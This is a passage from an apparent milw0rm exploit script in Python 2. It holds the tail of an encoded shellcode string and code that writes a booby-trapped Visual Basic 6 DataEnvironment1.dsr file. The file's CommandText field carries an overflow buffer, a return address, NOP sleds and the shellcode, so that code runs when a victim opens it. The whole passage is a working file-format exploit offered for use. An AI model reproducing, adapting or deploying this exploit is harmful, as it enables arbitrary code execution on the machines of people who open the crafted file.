"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
)
dsrfile = (
"VERSION 5.00\n"
"Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n"
" ClientHeight = 6315\n"
" ClientLeft = 0\n"
" ClientTop = 0\n"
" ClientWidth = 7980\n"
" _ExtentX = 14076\n"
" _ExtentY = 11139\n"
" FolderFlags = 1\n"
' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n'
' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n'
" TypeInfoCookie = 0\n"
" Version = 4\n"
" NumConnections = 1\n"
" BeginProperty Connection1\n"
' ConnectionName = "Connection1"\n'
" ConnDispId = 1001\n"
" SourceOfData = 3\n"
' ConnectionSource= ""\n'
" Expanded = -1 'True\n"
" QuoteChar = 96\n"
" SeparatorChar = 46\n"
" EndProperty\n"
" NumRecordsets = 1\n"
" BeginProperty Recordset1\n"
' CommandName = "Command1"\n'
" CommDispId = 1002\n"
" RsDispId = 1003\n"
' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"\n'
' ActiveConnectionName= "Connection1"\n'
" CommandType = 2\n"
" dbObjectType = 1\n"
" Locktype = 3\n"
" IsRSReturning = -1 'True\n"
" NumFields = 1\n"
" BeginProperty Field1\n"
" Precision = 10\n"
" Size = 4\n"
" Scale = 0\n"
" Type = 3\n"
' Name = "ID"\n'
' Caption = "ID"\n'
" EndProperty\n"
" NumGroups = 0\n"
" ParamCount = 0\n"
" RelationCount = 0\n"
" AggregateCount = 0\n"
" EndProperty\n"
"End\n"
'Attribute VB_Name = "DataEnvironment1"\n'
"Attribute VB_GlobalNameSpace = False\n"
"Attribute VB_Creatable = True\n"
"Attribute VB_PredeclaredId = True\n"
"Attribute VB_Exposed = False\n"
)
try:
out_file = open("DataEnvironment1.dsr",'w')
out_file.write(dsrfile)
out_file.close()
print "\nFILE CREATION COMPLETED!\n"
except:
print " \n -------------------------------------"
print " Usage: exploit.py"
print " -------------------------------------"
print "\nAN ERROR OCCURS DURING FILE CREATION!"
# milw0rm.com [2008-04-04]